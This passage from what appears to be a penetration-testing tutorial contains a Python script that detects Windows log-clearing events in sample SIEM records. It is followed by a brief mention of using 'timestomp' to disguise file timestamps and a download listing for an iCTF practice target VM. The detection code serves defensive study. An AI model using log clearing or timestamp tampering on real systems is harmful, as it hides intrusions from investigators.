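    ("System", 104),     # "The System log file was cleared" (Vista and later)
}

# Constructed sample events shaped like a SIEM export; not real logs.
SAMPLE_EVENTS = [
    {"time": "2022-04-17T15:50:12", "channel": "Security", "event_id": 1102,
     "subject": "DH-CA8822AB9589\\Administrator"},
    {"time": "2022-04-17T15:52:30", "channel": "Security", "event_id": 4624,
     "subject": "DH-CA8822AB9589\\Administrator"},
    {"time": "2022-04-17T15:50:13", "channel": "System", "event_id": 104,
     "subject": "DH-CA8822AB9589\\Administrator"},
    {"time": "2022-04-17T15:51:00", "channel": "System", "event_id": 7036,
     "subject": "NT AUTHORITY\\SYSTEM"},
    {"time": "2022-04-17T09:00:00", "channel": "Application", "event_id": 1000,
     "subject": "NT AUTHORITY\\SYSTEM"},
]

def is_log_clear(event):
    """True if the event records a log channel being cleared."""
    return (event["channel"], event["event_id"]) in LOG_CLEAR_SIGNATURES

def find_log_clears(events):
    """Return (time, channel, subject) for every clear event, oldest first."""
    hits = [(e["time"], e["channel"], e.get("subject", "?"))
            for e in events if is_log_clear(e)]
    return sorted(hits)  # ISO-8601 timestamps sort correctly as strings

def channels_starting_with_clear(events):
    """Channels whose oldest surviving record is the clear event itself."""
    by_channel = defaultdict(list)
    for e in events:
        by_channel[e["channel"]].append(e)
    return sorted(ch for ch, evs in by_channel.items()
                  if is_log_clear(min(evs, key=lambda e: e["time"])))

if __name__ == "__main__":
    for time, channel, subject in find_log_clears(SAMPLE_EVENTS):
        print(f"{time} {channel} log cleared by {subject}")
    print("channels that begin with a clear event:",
          channels_starting_with_clear(SAMPLE_EVENTS))
```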

    Disguise the timestamps of modified files

    timestomp
    

    iCTF

    Environment overview

    | Environment name | Purpose | Notes |
    | --- | --- | --- |
    | iCTF 2011 Server | Linux target | Download the VMware virtual machine image |

    Environment download

    Link: https://pan.baidu.com/s/1KYRLKW1iRS-YfSoM-xlMdg?pwd=ju8g
    Extraction code: ju8g
